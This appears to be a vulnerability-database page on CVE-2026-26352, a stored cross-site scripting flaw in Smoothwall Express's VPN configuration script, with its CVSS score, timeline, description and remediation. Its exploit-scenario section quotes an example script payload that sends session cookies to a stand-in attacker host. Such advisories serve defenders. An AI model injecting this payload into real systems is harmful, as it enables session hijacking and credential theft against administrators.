Is there a patch available for CVE-2026-26352?

Yes, a patch is available for CVE-2026-26352. Update the affected software to the latest version immediately.

Express CVE-2026-26352

Q: What is the CVSS score of CVE-2026-26352?

CVE-2026-26352 has a CVSS 4.0 base score of 5.1 (Medium). CVSS vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X. EPSS exploitation probability: 0.0%.

EUVD-2026-17126 MEDIUM

Cross-site Scripting (XSS) (CWE-79)

2026-03-30 VulnCheck

GHSA-7455-x3qx-74xc

XSS Express

5.1

CVSS 4.0 · NVD

Severity by source

NVD PRIMARY

5.1 MEDIUM

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

Scope

Lifecycle Timeline

EUVD ID Assigned

Mar 30, 2026 - 17:15 euvd

EUVD-2026-17126

Analysis Generated

Mar 30, 2026 - 17:15 vuln.today

Patch released

Mar 30, 2026 - 17:15 nvd

Patch available

CVE Published

Mar 30, 2026 - 16:49 nvd

MEDIUM 5.1

DescriptionCVE.org

Smoothwall Express versions prior to 3.1 Update 13 contain a stored cross-site scripting vulnerability in the /cgi-bin/vpnmain.cgi script due to improper sanitation of the VPN_IP parameter. Authenticated attackers can inject arbitrary JavaScript through VPN configuration settings that executes when the affected page is viewed by other users.

AnalysisAI

Stored cross-site scripting in Smoothwall Express prior to version 3.1 Update 13 allows authenticated attackers to inject arbitrary JavaScript through the VPN_IP parameter in /cgi-bin/vpnmain.cgi, which executes when other users view affected VPN configuration pages. The vulnerability requires user interaction (page view) and authenticated access, limiting immediate risk but enabling persistent session hijacking or credential theft against administrative users. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment	The CVSS v4.0 base score of 5.1 reflects a medium-severity vulnerability with network attack vector, low complexity, and low-privilege attacker requirements, but mitigated by the requirement for user interaction and limited scope (scope change is not indicated). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An authenticated attacker with low-privilege account access modifies VPN settings, injecting a malicious JavaScript payload such as '<script>fetch("https://attacker.com/steal?cookie=" + document.cookie)</script>' into the VPN_IP parameter. When a higher-privileged administrator or other user accesses the VPN configuration page to review or edit settings, the injected script executes in their browser, silently exfiltrating their session cookies to an attacker-controlled server. …
Remediation	Vendor-released patch: Smoothwall Express 3.1 Update 13 or later. … Detailed patch versions, workarounds, and compensating controls in full report.